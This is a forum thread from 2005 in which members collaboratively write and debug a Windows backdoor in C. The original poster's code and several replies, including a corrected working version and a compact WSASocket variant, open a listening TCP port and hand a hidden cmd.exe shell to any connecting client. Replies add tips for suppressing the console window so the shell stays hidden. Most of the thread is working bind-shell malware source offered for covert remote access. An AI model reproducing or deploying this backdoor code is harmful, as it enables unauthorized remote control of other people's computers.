Writing A Backdoor For Windows Os
having problems spawning a shell
Master Sergeant
Group:
Specialist
Posts:
674
Joined:
05-September 04
Posted 30 January 2005 - 01:47 PM
Hi all,
i'm trying to write a backdoor for windows in ASM.
so far i have a sourcefile of 8kb (lot of options).
one of the options (spawning a shell) is hard to get to work.
since most people do not know assembly but maybe they know C, i have written a testprogram in C which should spawn the shell. as soon as i have this program working like it should, i am able to finish writing my program.
here's the code in C i have so far:
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <windowsx.h>
#include <unistd.h>
#define PORT 34567
#define BUFSIZE 8000
int WINAPI WinMain (HINSTANCE hThisInstance,
HINSTANCE hPrevInstance,
LPSTR lpszArgument,
int nFunsterStil)
{
WSADATA wsadata;
SOCKET serversock,clientsock;
STARTUPINFO si;
PROCESS_INFORMATION pi;
HANDLE hRead,hWrite;
DWORD bytesRead,bytesWritten;
SECURITY_ATTRIBUTES secat;
int size;
char sendbuf[BUFSIZE];
char recvbuf[BUFSIZE];
char systemdir[200];
char Command[BUFSIZE+200];
const char *string1="Written by White Scorpion Security (C) 2004\n";
const char *string2="****** http://www.white-scorpion.nl *******\n\n";
const char Prompt[]="\nBackdoor:\\>";
ZeroMemory( &si, sizeof(si) );
si.cb = sizeof(si);
ZeroMemory( &pi, sizeof(pi) );
struct sockaddr_in server;
server.sin_family = AF_INET;
server.sin_addr.s_addr = INADDR_ANY;
server.sin_port = htons(PORT);
ZeroMemory(server.sin_zero,sizeof(server.sin_zero));
struct sockaddr_in client;
size=sizeof(client);
if(WSAStartup(MAKEWORD(2,0),&wsadata)!=0)
return EXIT_FAILURE;
if((serversock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==SOCKET_ERROR)
{
printf("error creating socket");
getch();
WSACleanup();
return EXIT_FAILURE;
}
if((bind(serversock,(struct sockaddr*)&server,sizeof(server)))==SOCKET_ERROR)
{
printf("Error binding socket");
getch();
WSACleanup();
return EXIT_FAILURE;
}
if((listen(serversock,5))==SOCKET_ERROR)
{
printf("error listening");
getch();
WSACleanup();
return EXIT_FAILURE;
}
secat.nLength=sizeof(secat);
secat.lpSecurityDescriptor=NULL;
secat.bInheritHandle=TRUE;
while(1)
{
if((clientsock=accept(serversock,(struct sockaddr*)&client,&size))==INVALID_SOCKET)
{
close(serversock);
WSACleanup();
return EXIT_FAILURE;
}
send(clientsock,string1,strlen(string1),0);
send(clientsock,string2,strlen(string2),0);
CreatePipe(&hRead,&hWrite,&secat,0);
GetStartupInfo(&si);
si.hStdError=hWrite;
si.hStdOutput=hWrite;
si.wShowWindow=SW_HIDE;
si.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
CreateProcess(NULL,TEXT("cmd.exe"),NULL,NULL,TRUE,
NULL,NULL,NULL,&si,&pi);
while (TRUE)
{
if (ReadFile(hRead,sendbuf,sizeof(sendbuf),&bytesRead,NULL)==0)
break;
send(clientsock,sendbuf,bytesRead,0);
memset(sendbuf,0,sizeof (sendbuf));
}
}
}
if you compile and run this program it will listen to port 34567. when connected to the port it starts cmd.exe and redirects the output to the socket.
so far so good, but unfortunately this is about it.
the client will receive a command prompt, but when he enters his first command the program hangs in an infinite loop.
my problem is that i do not know how to get the command that is given to cmd.exe (process).
any ideas are highly appreciated :D
Kind regards,
0
Private First Class
Group:
Members
Posts:
31
Joined:
02-September 04
Posted 30 January 2005 - 02:31 PM
hi,
0
Master Sergeant
Group:
Specialist
Posts:
674
Joined:
05-September 04
Posted 30 January 2005 - 10:44 PM
i see what you mean, now i have the following:
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <windowsx.h>
#include <unistd.h>
#define PORT 34567
#define BUFSIZE 8000
int WINAPI WinMain (HINSTANCE hThisInstance,
HINSTANCE hPrevInstance,
LPSTR lpszArgument,
int nFunsterStil)
{
WSADATA wsadata;
SOCKET serversock,clientsock;
STARTUPINFO si;
PROCESS_INFORMATION pi;
HANDLE hRead,hWrite,hRead2,hWrite2;
DWORD bytesRead,bytesWritten;
SECURITY_ATTRIBUTES secat;
int size;
char sendbuf[BUFSIZE];
char recvbuf[BUFSIZE];
char systemdir[200];
char Command[BUFSIZE+200];
const char *string1="Written by White Scorpion Security (C) 2004\n";
const char *string2="****** http://www.white-scorpion.nl *******\n\n";
const char Prompt[]="\nBackdoor:\\>";
ZeroMemory( &si, sizeof(si) );
si.cb = sizeof(si);
ZeroMemory( &pi, sizeof(pi) );
struct sockaddr_in server;
server.sin_family = AF_INET;
server.sin_addr.s_addr = INADDR_ANY;
server.sin_port = htons(PORT);
ZeroMemory(server.sin_zero,sizeof(server.sin_zero));
struct sockaddr_in client;
size=sizeof(client);
if(WSAStartup(MAKEWORD(2,0),&wsadata)!=0)
return EXIT_FAILURE;
if((serversock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==SOCKET_ERROR)
{
printf("error creating socket");
getch();
WSACleanup();
return EXIT_FAILURE;
}
if((bind(serversock,(struct sockaddr*)&server,sizeof(server)))==SOCKET_ERROR)
{
printf("Error binding socket");
getch();
WSACleanup();
return EXIT_FAILURE;
}
if((listen(serversock,5))==SOCKET_ERROR)
{
printf("error listening");
getch();
WSACleanup();
return EXIT_FAILURE;
}
secat.nLength=sizeof(secat);
secat.lpSecurityDescriptor=NULL;
secat.bInheritHandle=TRUE;
while(1)
{
if((clientsock=accept(serversock,(struct sockaddr*)&client,&size))==INVALID_SOCKET)
{
close(serversock);
WSACleanup();
return EXIT_FAILURE;
}
send(clientsock,string1,strlen(string1),0);
send(clientsock,string2,strlen(string2),0);
CreatePipe(&hRead,&hWrite,&secat,0);
CreatePipe(hRead2,&hWrite2,&secat,0);
GetStartupInfo(&si);
si.hStdError=hWrite;
si.hStdOutput=hWrite;
si.wShowWindow=SW_HIDE;
si.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
CreateProcess(NULL,TEXT("cmd.exe"),NULL,NULL,TRUE,
DETACHED_PROCESS,NULL,NULL,&si,&pi);
while (TRUE)
{
if(ReadFile(hRead,sendbuf,sizeof(sendbuf),&bytesRead,NULL)==0)
break;
send(clientsock,sendbuf,bytesRead,0);
memset(sendbuf,0,sizeof (sendbuf));
recv(clientsock,recvbuf,bytesWritten,0);
if(WriteFile(hWrite2,recvbuf,sizeof(recvbuf),&bytesWritten,NULL)==0)
break;
memset(recvbuf,0,sizeof(sendbuf));
}
}
}
something goes wrong with this code since the app crashes after connection....
0
Private First Class
Group:
Members
Posts:
31
Joined:
02-September 04
Posted 31 January 2005 - 02:42 AM
change : CreatePipe(hRead2,&hWrite2,&secat,0);
0
Master Sergeant
Group:
Specialist
Posts:
674
Joined:
05-September 04
Posted 31 January 2005 - 12:52 PM
well,
i think the pipe works, but the program itself still doesn't work...
how can i use the pipe to send the data to the cmd.exe?
here's the code that i have so far:
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <windowsx.h>
#include <unistd.h>
#define PORT 12345
#define BUFSIZE 8000
int WINAPI WinMain (HINSTANCE hThisInstance,
HINSTANCE hPrevInstance,
LPSTR lpszArgument,
int nFunsterStil)
{
WSADATA wsadata;
SOCKET serversock,clientsock;
STARTUPINFO si;
PROCESS_INFORMATION pi;
HANDLE hRead,hWrite,hRead2,hWrite2;
DWORD bytesRead,bytesWritten;
SECURITY_ATTRIBUTES secat;
int size;
char sendbuf[BUFSIZE];
char recvbuf[BUFSIZE];
char systemdir[200];
char Command[BUFSIZE+200];
const char *string1="Written by White Scorpion Security (C) 2004\n";
const char *string2="****** http://www.white-scorpion.nl *******\n\n";
ZeroMemory( &si, sizeof(si) );
si.cb = sizeof(si);
ZeroMemory( &pi, sizeof(pi) );
struct sockaddr_in server;
server.sin_family = AF_INET;
server.sin_addr.s_addr = INADDR_ANY;
server.sin_port = htons(PORT);
ZeroMemory(server.sin_zero,sizeof(server.sin_zero));
struct sockaddr_in client;
size=sizeof(client);
if(WSAStartup(MAKEWORD(2,0),&wsadata)!=0)
return EXIT_FAILURE;
if((serversock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==SOCKET_ERROR)
{
printf("error creating socket");
getch();
WSACleanup();
return EXIT_FAILURE;
}
if((bind(serversock,(struct sockaddr*)&server,sizeof(server)))==SOCKET_ERROR)
{
printf("Error binding socket");
getch();
WSACleanup();
return EXIT_FAILURE;
}
if((listen(serversock,5))==SOCKET_ERROR)
{
printf("error listening");
getch();
WSACleanup();
return EXIT_FAILURE;
}
secat.nLength=sizeof(secat);
secat.lpSecurityDescriptor=NULL;
secat.bInheritHandle=TRUE;
while(1)
{
if((clientsock=accept(serversock,(struct sockaddr*)&client,&size))==INVALID_SOCKET)
{
close(serversock);
WSACleanup();
return EXIT_FAILURE;
}
send(clientsock,string1,strlen(string1),0);
send(clientsock,string2,strlen(string2),0);
CreatePipe(&hRead,&hWrite,&secat,0);
CreatePipe(&hRead2,&hWrite2,&secat,0);
GetStartupInfo(&si);
si.hStdError=hWrite;
si.hStdOutput=hWrite;
si.hStdInput=hRead2;
si.wShowWindow=SW_HIDE;
si.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
CreateProcess(NULL,TEXT("cmd.exe"),NULL,NULL,TRUE,
DETACHED_PROCESS,NULL,NULL,&si,&pi);
while(1)
{
while (TRUE)
{
memset(sendbuf,0,sizeof (sendbuf));
if(ReadFile(hRead,sendbuf,BUFSIZE,&bytesRead,NULL)==0)
break;
send(clientsock,sendbuf,strlen(sendbuf),0);
}
recv(clientsock,recvbuf,strlen(recvbuf),0);
if(WriteFile(hWrite2,recvbuf,BUFSIZE,&bytesWritten,NULL)==0)
break;
memset(recvbuf,0,sizeof(sendbuf));
}
}
}
thanks for your help btw :D
0
Private First Class
Group:
Members
Posts:
31
Joined:
02-September 04
Posted 31 January 2005 - 02:26 PM
hi, edited it a bit to make it work...
#pragma comment(lib, "ws2_32.lib")
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
//#include <windowsx.h>
//#include <unistd.h>
#define PORT 12345
#define BUFSIZE 8000
int WINAPI WinMain (HINSTANCE hThisInstance,
HINSTANCE hPrevInstance,
LPSTR lpszArgument,
int nFunsterStil)
{
WSADATA wsadata;
SOCKET serversock,clientsock;
STARTUPINFO si;
PROCESS_INFORMATION pi;
HANDLE hRead,hWrite,hRead2,hWrite2;
DWORD bytesRead;
SECURITY_ATTRIBUTES secat;
int size;
char sendbuf[BUFSIZE];
const char *string1="Written by White Scorpion Security (C) 2004\n";
const char *string2="****** http://www.white-scorpion.nl *******\n\n";
struct timeval tv_r;
fd_set rfds;
ZeroMemory( &si, sizeof(si) );
si.cb = sizeof(si);
ZeroMemory( &pi, sizeof(pi) );
struct sockaddr_in server;
server.sin_family = AF_INET;
server.sin_addr.s_addr = INADDR_ANY;
server.sin_port = htons(PORT);
ZeroMemory(server.sin_zero,sizeof(server.sin_zero));
struct sockaddr_in client;
size=sizeof(client);
if(WSAStartup(MAKEWORD(2,0),&wsadata)!=0)
return EXIT_FAILURE;
if((serversock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==SOCKET_ERROR)
{
printf("error creating socket");
// getch();
WSACleanup();
return EXIT_FAILURE;
}
if((bind(serversock,(struct sockaddr*)&server,sizeof(server)))==SOCKET_ERROR)
{
printf("Error binding socket");
// getch();
WSACleanup();
return EXIT_FAILURE;
}
if((listen(serversock,5))==SOCKET_ERROR)
{
printf("error listening");
// getch();
WSACleanup();
return EXIT_FAILURE;
}
secat.nLength=sizeof(secat);
secat.lpSecurityDescriptor=NULL;
secat.bInheritHandle=TRUE;
tv_r.tv_sec = 0;
tv_r.tv_usec = 500;
while(1)
{
if((clientsock=accept(serversock,(struct sockaddr*)&client,&size))==INVALID_SOCKET)
{
closesocket(serversock);
WSACleanup();
return EXIT_FAILURE;
}
send(clientsock,string1,strlen(string1),0);
send(clientsock,string2,strlen(string2),0);
if(!CreatePipe(&hRead,&hWrite,&secat,0))
return EXIT_FAILURE;
if(!CreatePipe(&hRead2,&hWrite2,&secat,0))
return EXIT_FAILURE;
ZeroMemory(&si,sizeof(si));
si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
si.wShowWindow = SW_HIDE;
si.hStdInput = hRead2;
si.hStdOutput = si.hStdError = hWrite;
if(!CreateProcess(NULL,"cmd.exe",NULL,NULL,1,0,NULL,NULL,&si,&pi))
return EXIT_FAILURE;
while(1)
{
memset(sendbuf,0,sizeof(sendbuf));
Sleep(100);
PeekNamedPipe(hRead,sendbuf,sizeof(sendbuf),&bytesRead,0,0);
if(bytesRead)
{
if(!ReadFile(hRead, sendbuf, bytesRead, &bytesRead, 0))
return EXIT_FAILURE;
if(!send(clientsock, sendbuf, bytesRead, 0))
break;
}
else
{
FD_ZERO(&rfds);
FD_SET(clientsock, &rfds);
if ( select(FD_SETSIZE, &rfds, NULL, NULL, &tv_r) < 0)
return EXIT_FAILURE;
if (FD_ISSET(clientsock, &rfds))
{
if( (bytesRead=recv(clientsock, sendbuf, sizeof(sendbuf), 0)) < 1)
break;
if ( strnicmp( sendbuf, "exit", 4) == 0 )
break;
if(!WriteFile(hWrite2, sendbuf, bytesRead, &bytesRead, 0))
return EXIT_FAILURE;
}
}
}
TerminateProcess(pi.hProcess, 1);
CloseHandle(hWrite2);
CloseHandle(hRead);
CloseHandle(hRead2);
CloseHandle(hWrite);
closesocket(clientsock);
}
}
Greetz x^r
0
Private First Class
Group:
Members
Posts:
31
Joined:
02-September 04
Posted 31 January 2005 - 03:01 PM
you might also wanne use 'WSASocket()' in your code wich eliminates the use of pipes..
WSASocket() retuns sockets that can be used as an 'HANDLE'
// cl /nologo /W3 /MD test.c
#pragma comment (lib,"ws2_32")
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
int main()
{
WSADATA wsd;
SOCKET s1,s2;
struct sockaddr_in sockadd;
int len=sizeof(sockadd);
STARTUPINFO SI;
PROCESS_INFORMATION PI;
sockadd.sin_family=AF_INET;
sockadd.sin_port=htons(31337);
sockadd.sin_addr.s_addr=htonl(INADDR_ANY);
WSAStartup(MAKEWORD(2,2),&wsd);
s1=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,0,0,0);
bind(s1,(struct sockaddr *)&sockadd,len);
listen(s1,5);
while(1)
{
s2=accept(s1,(struct sockaddr *)&sockadd,&len);
ZeroMemory(&SI,sizeof(SI));
ZeroMemory(&PI,sizeof(PI));
SI.cb = sizeof(SI);
SI.dwFlags=STARTF_USESTDHANDLES;
SI.hStdError=(HANDLE)s2;
SI.hStdInput=(HANDLE)s2;
SI.hStdOutput=(HANDLE)s2;
CreateProcess(NULL,"cmd",NULL,NULL,1,0,NULL,NULL,&SI,&PI);
WaitForSingleObject(PI.hProcess,INFINITE);
closesocket(s2);
}
return 0;
}
No error checking in this code tho :))
Greetz x^r
0
Master Sergeant
Group:
Specialist
Posts:
674
Joined:
05-September 04
Posted 01 February 2005 - 03:58 AM
well, you'r making it a bit complicated like this...
the first one (edited one) you have added several structures which i do not understand yet...
it compiles fine, but it will not keep running, so it is not listening like it should.
the other one is more like my way of coding (not too complicated), but i can not compile it. which compiler are you using?
if i use dev-cpp i get the error:
Quote
undefined reference to 'WSASocketA@24'
i've added the normal parameter to the linker (libwsock32.a). this parameter normally is sufficient for winsock API's, but appearently not when using WSASocket.
i've tried googling for WSASocket, and all you seem to need is
#include <winsock2.h>
however, this doesn't work for me :(
i've tried figuring out the pipes some more, since i might be able to use them with local input and if i manage to do that, then the link to the socket is pretty easy :D
Kind regards,
and congratz with your membership btw ;)
0
Private First Class
Group:
Members
Posts:
31
Joined:
02-September 04
Posted 01 February 2005 - 06:34 AM
Quote
the first one (edited one) you have added several structures which i do not understand yet...
I only added a timout on the recv() from socket else it will wait forever,
while the cmd.exe might have output waiting...
here it stays running and is listening like it should..
I use Microsoft Visual Studio 6.0 to compile
Greetz x^r
0
Sergeant
Group:
Members
Posts:
234
Joined:
01-September 03
Posted 01 February 2005 - 07:39 AM
[in reply to x^r's code]
to fix the problem do :: Project -> Settings -> Link -> Catagory Output -> and fill in as Entr-point-symbol : mainCRTStartup
its should compile fine now
althou i must say the program is in-perfect. It shows a flash of a consolewindow on connection and no output is given.
the console flash thou is easily solved by changing :
SI.dwFlags=STARTF_USESTDHANDLES;
to
SI.dwFlags = STARTF_USESHOWWINDOW;
SI.wShowWindow = SW_HIDE;
to fix the input output thing i dont quite know. I ported the code to Delphi and it all goes smooth except one thing, the shell is spawned inside the window i run it in :blink:
:edit: ow, i found out it was because of the change with usesstadhandles and usesshowwindow...
0
Master Sergeant
Group:
Specialist
Posts:
674
Joined:
05-September 04
Posted 01 February 2005 - 10:00 AM
Hi,
well, i've tried with USESHOWWINDOW and with stdhandles, well with stdhandles nothing happens when you connect, and with the following code:
// cl /nologo /W3 /MD test.c
#pragma comment (lib,"ws2_32")
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
int main()
{
WSADATA wsd;
SOCKET s1,s2;
struct sockaddr_in sockadd;
int len=sizeof(sockadd);
STARTUPINFO SI;
PROCESS_INFORMATION PI;
sockadd.sin_family=AF_INET;
sockadd.sin_port=htons(31337);
sockadd.sin_addr.s_addr=htonl(INADDR_ANY);
WSAStartup(MAKEWORD(2,2),&wsd);
s1=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,0,0,0);
bind(s1,(struct sockaddr *)&sockadd,len);
listen(s1,5);
while(1)
{
s2=accept(s1,(struct sockaddr *)&sockadd,&len);
ZeroMemory(&SI,sizeof(SI));
ZeroMemory(&PI,sizeof(PI));
SI.cb = sizeof(SI);
SI.dwFlags = STARTF_USESTDHANDLES;
SI.wShowWindow = SW_HIDE;
SI.hStdError=(HANDLE)s2;
SI.hStdInput=(HANDLE)s2;
SI.hStdOutput=(HANDLE)s2;
CreateProcess(NULL,"cmd",NULL,NULL,1,0,NULL,NULL,&SI,&PI);
WaitForSingleObject(PI.hProcess,INFINITE);
closesocket(s2);
}
return 0;
}
you get an endless loop of spawning CMD.exe processes... i'm glad i had a program in handy which killed all the cmd.exe when i told it to, otherwise i might had to reboot my complete computer to get it to work again :)
thank god i have a couple of hours spare time tonight, so i will try to figure out how the pipes work without using sockets. if i can manage to get that to work, then i think it won't be a problem getting the sockets involved as well...
0
Sergeant First Class
Group:
Members
Posts:
301
Joined:
09-September 03
Posted 03 February 2005 - 02:06 AM
Sounds like you want the same shell option like NetCat already has. So why not check the code of NetCat? There you'll find the answer :ph34r:
I attached ver 1.11NT - good luck!
Btw: You only need the doexec.c :)
0
Master Sergeant
Group:
Specialist
Posts:
674
Joined:
05-September 04
Posted 03 February 2005 - 12:49 PM
thanks for the idea, but unfortunately i already done that (it was the first thing i did several months ago when i first started with it).
0
1 User(s) are reading this topic0 members, 1 guests, 0 anonymous users
Our Sponsors:
Sign In
Register
Help
MultiQuote
